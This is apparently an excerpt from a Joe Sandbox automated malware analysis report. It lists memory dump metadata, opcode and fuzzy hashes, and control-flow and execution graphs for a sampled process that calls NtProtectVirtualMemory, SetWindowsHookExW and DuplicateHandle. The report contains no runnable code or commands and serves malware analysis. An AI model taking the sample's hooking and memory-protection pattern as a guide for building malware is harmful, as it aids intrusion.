                                  • Instruction Fuzzy Hash: 0DC012A103C3D89BC31612B4B40A1B7BF384413124B0A059BE5558D493859D28D0C6A2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4d2c889cbda3f3abcaa23e93894c45012534c7ebba73c64f96d0be4100e16c6
                                  • Instruction ID: f1ba68a933f2c2c281c80348fb820840ad17779d0cc33aa0707ced4a186a0fdc
                                  • Opcode Fuzzy Hash: e4d2c889cbda3f3abcaa23e93894c45012534c7ebba73c64f96d0be4100e16c6
                                  • Instruction Fuzzy Hash: F5C08CB1040346CBD3206BDCA70E32837A85B10212F810011E019820A0CB7820D0CA76
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d136baa6a11dd4b071a14a00d2d0c670e9c93a65fb3dfb2e09a5495d48428d3c
                                  • Instruction ID: 7aed68f3586d53abc84b96752079bfada90c4fe9695c0519772f3a9f07728680
                                  • Opcode Fuzzy Hash: d136baa6a11dd4b071a14a00d2d0c670e9c93a65fb3dfb2e09a5495d48428d3c
                                  • Instruction Fuzzy Hash: C3D0C9B2428150DFC300CB55DD968883BF0BE1A201745098AC0054B262D220A4118B81
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c396bf5d9e9ea296d9445eb550bdf5f7d73a7ac0c88fb7a910ffa7be8451f0c3
                                  • Instruction ID: cd5718914deaf5692639dc62b55573f8fb7fbb1eb08095058155d9e24175fdc6
                                  • Opcode Fuzzy Hash: c396bf5d9e9ea296d9445eb550bdf5f7d73a7ac0c88fb7a910ffa7be8451f0c3
                                  • Instruction Fuzzy Hash: 7AB092E39208428AF701A8B4CA2BB651E00DBB1205B1942144B08A024CD619E12B40A7
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42ad1a50f986c4e2d8decafac4f6786bc6a2d4ebde51cac54f0dc3d8da893079
                                  • Instruction ID: 2f69a990563d453b4f7e166333721943eda336cbf3d3182c0f203d1d94b1dfab
                                  • Opcode Fuzzy Hash: 42ad1a50f986c4e2d8decafac4f6786bc6a2d4ebde51cac54f0dc3d8da893079
                                  • Instruction Fuzzy Hash: 4AB092E403C26CC30540E1D820291353A1C6027A01E00031EA14F249010BC314D10073
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37d7cc66bf7dcfeffd91d7afa613574cbd161d991973b2df73f47d21c7907d9b
                                  • Instruction ID: 91d200c1f37be0983cb37541cb8566e4ab7adcbc0ffadfc38620cc1a9aa475ef
                                  • Opcode Fuzzy Hash: 37d7cc66bf7dcfeffd91d7afa613574cbd161d991973b2df73f47d21c7907d9b
                                  • Instruction Fuzzy Hash: 2DB012B51B9704E35401F3F44C89E2A5560FBB2701F40CF09330D2002485B5442DD617
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19a9afb411ddfaecbce09f07fee1a0267f6849c6df284200cc42abc31b830dfa
                                  • Instruction ID: e51216e7294e309151318364f0f34913ed079cbc39fa220ec5916cbe8ca8931d
                                  • Opcode Fuzzy Hash: 19a9afb411ddfaecbce09f07fee1a0267f6849c6df284200cc42abc31b830dfa
                                  • Instruction Fuzzy Hash: 15C04CF0BB4219EFDB21CA51EF47D6C76766B16A01F520668A6026A1D4D7A046418A40
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84e6ec2290c1844fb9aad652b39c4f38449cf7bab70d786ab75e3122948217b4
                                  • Instruction ID: d6e9754343cacb81201fb1ce374a04254cfa4efcd7b5674505b8592bc642cdaa
                                  • Opcode Fuzzy Hash: 84e6ec2290c1844fb9aad652b39c4f38449cf7bab70d786ab75e3122948217b4
                                  • Instruction Fuzzy Hash: E9A012A003820CD6420851547009236FB3C1011204B50050CE90A0804056DE3460C044

                                  Execution Graph

                                  Execution Coverage:11.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:34
                                  Total number of Limit Nodes:3
                                  execution_graph 13758 30f0d0c 13759 30f0d11 13758->13759 13762 30f50ba 13759->13762 13760 30f0e29 13763 30f50d8 13762->13763 13767 30f5202 13763->13767 13771 30f5210 13763->13771 13764 30f513a 13764->13760 13768 30f522f 13767->13768 13775 30f3798 13768->13775 13772 30f522f 13771->13772 13773 30f3798 SetWindowsHookExW 13772->13773 13774 30f5255 13773->13774 13774->13774 13776 30f5360 SetWindowsHookExW 13775->13776 13778 30f5255 13776->13778 13779 30f0c48 13780 30f0c68 13779->13780 13782 30f50ba SetWindowsHookExW 13780->13782 13781 30f0e29 13782->13781 13785 30fa618 13786 30fa65e GetCurrentProcess 13785->13786 13788 30fa6a9 13786->13788 13789 30fa6b0 GetCurrentThread 13786->13789 13788->13789 13790 30fa6ed GetCurrentProcess 13789->13790 13791 30fa6e6 13789->13791 13792 30fa723 13790->13792 13791->13790 13793 30fa74b GetCurrentThreadId 13792->13793 13794 30fa77c 13793->13794 13795 30f3397 13796 30f32c3 NtProtectVirtualMemory 13795->13796 13799 30f33a2 13795->13799 13798 30f3368 13796->13798 13783 30fa860 DuplicateHandle 13784 30fa8f6 13783->13784

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 30f2e7a-30f2ebc 309 30f2ebe-30f2ec0 308->309 310 30f2ec8-30f2ecb 308->310 311 30f3236-30f3265 309->311 312 30f2ec6 309->312 310->311 313 30f2ed1-30f2ef4 310->313 329 30f326c-30f3270 311->329 312->313 316 30f2ef6-30f2ef8 313->316 317 30f2f00-30f2f03 313->317 316->311 319 30f2efe 316->319 317->311 320 30f2f09-30f2f2f 317->320 319->320 323 30f2f3d-30f2f41 320->323 324 30f2f31-30f2f35 320->324 323->311 327 30f2f47-30f2f55 323->327 324->311 326 30f2f3b 324->326 326->327 330 30f2f57-30f2f62 327->330 331 30f2f64-30f2f6c 327->331 332 30f327d-30f3366 NtProtectVirtualMemory 329->332 333 30f3272-30f327c 329->333 334 30f2f6f-30f2f71 330->334 331->334 362 30f336f-30f3394 332->362 363 30f3368-30f336e 332->363 335 30f2f7d-30f2f80 334->335 336 30f2f73-30f2f75 334->336 335->311 339 30f2f86-30f2fa9 335->339 336->311 338 30f2f7b 336->338 338->339 343 30f2fab-30f2fad 339->343 344 30f2fb5-30f2fb8 339->344 343->311 345 30f2fb3 343->345 344->311 346 30f2fbe-30f2fe2 344->346 345->346 349 30f2fee-30f2ff1 346->349 350 30f2fe4-30f2fe6 346->350 349->311 353 30f2ff7-30f3018 349->353 350->311 352 30f2fec 350->352 352->353 357 30f301a-30f301c 353->357 358 30f3024-30f3027 353->358 357->311 359 30f3022 357->359 358->311 360 30f302d-30f3051 358->360 359->360 366 30f305d-30f3060 360->366 367 30f3053-30f3055 360->367 363->362 366->311 369 30f3066-30f308a 366->369 367->311 370 30f305b 367->370 373 30f308c-30f308e 369->373 374 30f3096-30f3099 369->374 370->369 373->311 375 30f3094 373->375 374->311 376 30f309f-30f30c3 374->376 375->376 378 30f30cf-30f30d2 376->378 379 30f30c5-30f30c7 376->379 378->311 381 30f30d8-30f30eb 378->381 379->311 380 30f30cd 379->380 380->381 381->329 383 30f30f1-30f3120 381->383 384 30f312c-30f312f 383->384 385 30f3122-30f3124 383->385 384->311 387 30f3135-30f314d 384->387 385->311 386 30f312a 385->386 386->387 389 30f314f-30f3151 387->389 390 30f3159-30f315c 387->390 389->311 391 30f3157 389->391 390->311 392 30f3162-30f3179 390->392 391->392 395 30f317f-30f31a2 392->395 396 30f3225-30f322e 392->396 398 30f31ae-30f31b1 395->398 399 30f31a4-30f31a6 395->399 396->383 397 30f3234 396->397 397->329 398->311 401 30f31b7-30f31e7 398->401 399->311 400 30f31ac 399->400 400->401 403 30f31ef-30f31f2 401->403 404 30f31e9-30f31eb 401->404 403->311 406 30f31f4-30f3211 403->406 404->311 405 30f31ed 404->405 405->406 408 30f3219-30f321c 406->408 409 30f3213-30f3215 406->409 408->311 411 30f321e-30f3223 408->411 409->311 410 30f3217 409->410 410->411 411->329
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q
                                  • API String ID: 2706961497-612143306
                                  • Opcode ID: e96b21d5098794a782d3e19845f517cd1f13387634f8a0f43d0b3e77310cf762
                                  • Instruction ID: 1f4340d712c247ba4f09ad74887ad5fc294433cd4e38f9fda288757ed2e142fa
                                  • Opcode Fuzzy Hash: e96b21d5098794a782d3e19845f517cd1f13387634f8a0f43d0b3e77310cf762
                                  • Instruction Fuzzy Hash: 68E1A339F063054FDB94DAAD8CD03AEB6E76BC8230F5D8679DA15DBB84EA34D8014741

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 412 30f3397-30f33a0 413 30f3333-30f3335 412->413 414 30f33a2-30f33e0 call 30f1354 412->414 415 30f3337-30f3366 NtProtectVirtualMemory 413->415 416 30f32c3-30f3330 413->416 419 30f336f-30f3394 415->419 420 30f3368-30f336e 415->420 416->415 420->419
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: dq
                                  • API String ID: 2706961497-4057445327
                                  • Opcode ID: 802a5ee97df55dfb6595330dfc24574a045267eb56ffa2db15b71f6ac71ea5e7
                                  • Instruction ID: 15725d11a35977490e6a971880c6ce5291956b963e89d02ac081e77c1c0b23b9
                                  • Opcode Fuzzy Hash: 802a5ee97df55dfb6595330dfc24574a045267eb56ffa2db15b71f6ac71ea5e7
                                  • Instruction Fuzzy Hash: EF31C7B58053499FCB50DFAAD880BDEBBF4FF49220F18846AE418E7240C7349900CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 704 30f32d0-30f3366 NtProtectVirtualMemory 707 30f336f-30f3394 704->707 708 30f3368-30f336e 704->708 708->707
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 3634f4cfa85ddec060e6979c01e7b5cd1c21bed221c201857bcbba4be8ad7e0f
                                  • Instruction ID: 52a6906c516210d2d3254f70efd21116456b7c46eb2400e3fb0d9c15e05de22c
                                  • Opcode Fuzzy Hash: 3634f4cfa85ddec060e6979c01e7b5cd1c21bed221c201857bcbba4be8ad7e0f
                                  • Instruction Fuzzy Hash: 2E21E3B5D013499FDB10DFAAD980ADEFBF5FF48310F24842AE919A7250C7759900CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 263 30fa612-30fa6a7 GetCurrentProcess 268 30fa6a9-30fa6af 263->268 269 30fa6b0-30fa6e4 GetCurrentThread 263->269 268->269 270 30fa6ed-30fa721 GetCurrentProcess 269->270 271 30fa6e6-30fa6ec 269->271 273 30fa72a-30fa745 call 30fa7e8 270->273 274 30fa723-30fa729 270->274 271->270 277 30fa74b-30fa77a GetCurrentThreadId 273->277 274->273 278 30fa77c-30fa782 277->278 279 30fa783-30fa7e5 277->279 278->279
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 030FA696
                                  • GetCurrentThread.KERNEL32 ref: 030FA6D3
                                  • GetCurrentProcess.KERNEL32 ref: 030FA710
                                  • GetCurrentThreadId.KERNEL32 ref: 030FA769
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9163cab208521fa1ef2370223f8732fbe5b6fe6dd13388fb465be93cedc1950b
                                  • Instruction ID: 0c4302dba6116104377dca1d09dee9c8dd35aed3dcad8391f3103d7dfb8124e1
                                  • Opcode Fuzzy Hash: 9163cab208521fa1ef2370223f8732fbe5b6fe6dd13388fb465be93cedc1950b
                                  • Instruction Fuzzy Hash: CA5133B19013098FEB54CFAAD988BEEBBF1EB48314F248459E119AB250D7346944CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 286 30fa618-30fa6a7 GetCurrentProcess 290 30fa6a9-30fa6af 286->290 291 30fa6b0-30fa6e4 GetCurrentThread 286->291 290->291 292 30fa6ed-30fa721 GetCurrentProcess 291->292 293 30fa6e6-30fa6ec 291->293 295 30fa72a-30fa745 call 30fa7e8 292->295 296 30fa723-30fa729 292->296 293->292 299 30fa74b-30fa77a GetCurrentThreadId 295->299 296->295 300 30fa77c-30fa782 299->300 301 30fa783-30fa7e5 299->301 300->301
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 030FA696
                                  • GetCurrentThread.KERNEL32 ref: 030FA6D3
                                  • GetCurrentProcess.KERNEL32 ref: 030FA710
                                  • GetCurrentThreadId.KERNEL32 ref: 030FA769
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 440ad99addbdfa6b8871edb69f6f07bb20ee41e8cf708fbaeb2cf890248facdb
                                  • Instruction ID: 3f6544ef8adc59fbbf1e7de4dd2cd905c229cd48a93c8da81bcf7630fe92a1ca
                                  • Opcode Fuzzy Hash: 440ad99addbdfa6b8871edb69f6f07bb20ee41e8cf708fbaeb2cf890248facdb
                                  • Instruction Fuzzy Hash: 095143B19013098FEB54CFAAD988BAEBBF1EB48314F248459E119AB250DB346944CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 712 30fa860-30fa8f4 DuplicateHandle 713 30fa8fd-30fa91a 712->713 714 30fa8f6-30fa8fc 712->714 714->713
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FA8E7
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f4d6a3c5a14853c8b6a208060f3b3df7e3a7a6e3697336b991bbf070b745a89b
                                  • Instruction ID: 8c32a8c80b6c3194635081e7babd1bd1fb7f72509c6bd99874e99bc77a21cd81
                                  • Opcode Fuzzy Hash: f4d6a3c5a14853c8b6a208060f3b3df7e3a7a6e3697336b991bbf070b745a89b
                                  • Instruction Fuzzy Hash: 7F21E3B5D00249EFDB10CF9AD484ADEFBF4EB48310F14841AE918A7350C378A945CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 728 30fa858-30fa8f4 DuplicateHandle 729 30fa8fd-30fa91a 728->729 730 30fa8f6-30fa8fc 728->730 730->729
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FA8E7
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 71d8f98d4916036e3a99fb797376fee57bdf3c3ea212717981b2dfc41ee35d03
                                  • Instruction ID: 5657b662d8cefd55a0fdbfdaedc811da2f83d5fbbc3a8e95c6a10387dd3ce161
                                  • Opcode Fuzzy Hash: 71d8f98d4916036e3a99fb797376fee57bdf3c3ea212717981b2dfc41ee35d03
                                  • Instruction Fuzzy Hash: D62100B5D00249EFDB10CFAAD484ADEFBF4FB08310F14841AE919A7610C378A941CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 717 30f3798-30f53aa 720 30f53ac 717->720 721 30f53b6-30f53e8 SetWindowsHookExW 717->721 724 30f53b4 720->724 722 30f53ea-30f53f0 721->722 723 30f53f1-30f5416 721->723 722->723 724->721
                                  APIs
                                  • SetWindowsHookExW.USER32(02EF45D0,00000000,?,?), ref: 030F53DB
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: e9e80dc7df99b6b9f87cc71328d1db388816de3d155ef889620c561bff130b43
                                  • Instruction ID: 68d64b54ff4d905d84bdebdbae6442c1f007dc78c0faa7281b3964b3f0264b40
                                  • Opcode Fuzzy Hash: e9e80dc7df99b6b9f87cc71328d1db388816de3d155ef889620c561bff130b43
                                  • Instruction Fuzzy Hash: 18213271D002089FDB14DFAAC844BEEFBF4FB88310F14842AE519A7650CBB4A940CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 733 30f535a-30f53aa 736 30f53ac 733->736 737 30f53b6-30f53e8 SetWindowsHookExW 733->737 740 30f53b4 736->740 738 30f53ea-30f53f0 737->738 739 30f53f1-30f5416 737->739 738->739 740->737
                                  APIs
                                  • SetWindowsHookExW.USER32(02EF45D0,00000000,?,?), ref: 030F53DB
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 7d61e009846dc5e45beeeaa7d6172f99d8822e6ed177f300f0b0b160b7625813
                                  • Instruction ID: f830b87a2b2745cf0775148b8f8e014df4cb4bda70c20add28b127cdf27f6b40
                                  • Opcode Fuzzy Hash: 7d61e009846dc5e45beeeaa7d6172f99d8822e6ed177f300f0b0b160b7625813
                                  • Instruction Fuzzy Hash: 65211571D002099FDB14DFAAC944BEEFBF5EF88310F14842AE415A7650CBB4A945CFA5
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3724554807.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_2efd000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf2a0cd434264e307d2fb99ad8fb80b0b0113b1e6d13d6c0c5bc737232dab8c9
                                  • Instruction ID: d35cefb1237dbf8b60eaa7b1463eb5aab3aaafb59d2c575d961f6617cea8fee7
                                  • Opcode Fuzzy Hash: cf2a0cd434264e307d2fb99ad8fb80b0b0113b1e6d13d6c0c5bc737232dab8c9
                                  • Instruction Fuzzy Hash: 5721F271544204EFEB55DF24DDC0B26BFA5FB88318F20C56DEA0A4B292C336D846CA72
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3724554807.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_2efd000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 05e84e50623aa9b41f884a276a73462698895f09322d067ffc22b25b2d8ee9bf
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: E711BB75544284DFDB06CF10D9C4B15BFA1FB88318F24C6A9DD494B696C33AD44ACB62

                                  Execution Graph

                                  Execution Coverage:34.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:8
                                  Total number of Limit Nodes:0
                                  execution_graph 2925 f732d0 2926 f7331e NtProtectVirtualMemory 2925->2926 2928 f73368 2926->2928 2929 f72e7a 2931 f72ebe 2929->2931 2930 f73272 2931->2930 2932 f73337 NtProtectVirtualMemory 2931->2932 2933 f73368 2932->2933

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 f72e7a-f72ebc 1 f72ebe-f72ec0 0->1 2 f72ec8-f72ecb 0->2 3 f73236-f73265 1->3 4 f72ec6 1->4 2->3 5 f72ed1-f72ef4 2->5 21 f7326c-f73270 3->21 4->5 8 f72ef6-f72ef8 5->8 9 f72f00-f72f03 5->9 8->3 11 f72efe 8->11 9->3 12 f72f09-f72f2f 9->12 11->12 15 f72f31-f72f35 12->15 16 f72f3d-f72f41 12->16 15->3 17 f72f3b 15->17 16->3 18 f72f47-f72f55 16->18 17->18 24 f72f57-f72f62 18->24 25 f72f64-f72f6c 18->25 22 f73272-f7327c 21->22 23 f7327d-f73366 NtProtectVirtualMemory 21->23 49 f7336f-f73394 23->49 50 f73368-f7336e 23->50 26 f72f6f-f72f71 24->26 25->26 28 f72f73-f72f75 26->28 29 f72f7d-f72f80 26->29 28->3 30 f72f7b 28->30 29->3 31 f72f86-f72fa9 29->31 30->31 35 f72fb5-f72fb8 31->35 36 f72fab-f72fad 31->36 35->3 38 f72fbe-f72fe2 35->38 36->3 37 f72fb3 36->37 37->38 41 f72fe4-f72fe6 38->41 42 f72fee-f72ff1 38->42 41->3 44 f72fec 41->44 42->3 45 f72ff7-f73018 42->45 44->45 51 f73024-f73027 45->51 52 f7301a-f7301c 45->52 50->49 51->3 54 f7302d-f73051 51->54 52->3 53 f73022 52->53 53->54 58 f73053-f73055 54->58 59 f7305d-f73060 54->59 58->3 61 f7305b 58->61 59->3 62 f73066-f7308a 59->62 61->62 64 f73096-f73099 62->64 65 f7308c-f7308e 62->65 64->3 67 f7309f-f730c3 64->67 65->3 66 f73094 65->66 66->67 69 f730c5-f730c7 67->69 70 f730cf-f730d2 67->70 69->3 72 f730cd 69->72 70->3 71 f730d8-f730eb 70->71 71->21 74 f730f1-f73120 71->74 72->71 75 f73122-f73124 74->75 76 f7312c-f7312f 74->76 75->3 77 f7312a 75->77 76->3 78 f73135-f7314d 76->78 77->78 80 f7314f-f73151 78->80 81 f73159-f7315c 78->81 80->3 82 f73157 80->82 81->3 83 f73162-f73179 81->83 82->83 86 f73225-f7322e 83->86 87 f7317f-f731a2 83->87 86->74 90 f73234 86->90 88 f731a4-f731a6 87->88 89 f731ae-f731b1 87->89 88->3 91 f731ac 88->91 89->3 92 f731b7-f731e7 89->92 90->21 91->92 94 f731ef-f731f2 92->94 95 f731e9-f731eb 92->95 94->3 97 f731f4-f73211 94->97 95->3 96 f731ed 95->96 96->97 99 f73213-f73215 97->99 100 f73219-f7321c 97->100 99->3 101 f73217 99->101 100->3 102 f7321e-f73223 100->102 101->102 102->21
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00F73359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000020.00000002.1644730523.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_32_2_f70000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q$D@$D@
                                  • API String ID: 2706961497-3182924711
                                  • Opcode ID: 29e3796d2cae0451f895af9c5771b7641e124d807cea88eb73ec9b622c368a9a
                                  • Instruction ID: c00fc3a962d42d824c2ca5f61b71e0d7f3b8ce228bdf1499cf01975f3d484784
                                  • Opcode Fuzzy Hash: 29e3796d2cae0451f895af9c5771b7641e124d807cea88eb73ec9b622c368a9a
                                  • Instruction Fuzzy Hash: FEE19032F043455BDB14CAAD8CD03AE76E36BC8324F69C22AD519DB385EA74DE01B742

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 f732d0-f73366 NtProtectVirtualMemory 391 f7336f-f73394 388->391 392 f73368-f7336e 388->392 392->391
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00F73359
                                  Memory Dump Source
                                  • Source File: 00000020.00000002.1644730523.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_32_2_f70000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d9f05d389d9c6f4fd4677cd7827f008e0aed2f08f6884b875f068b2674ebcf29
                                  • Instruction ID: 6fb714537accd9a331956311ed938d8aa354589daa7dbbe6c73d14496dac2263
                                  • Opcode Fuzzy Hash: d9f05d389d9c6f4fd4677cd7827f008e0aed2f08f6884b875f068b2674ebcf29
                                  • Instruction Fuzzy Hash: 0021D2B1D013499FDB10DFAAD980ADEFBF5FF48310F24842AE519A7250C7759901CBA5

                                  Execution Graph

                                  Execution Coverage:10.8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:46
                                  Total number of Limit Nodes:3
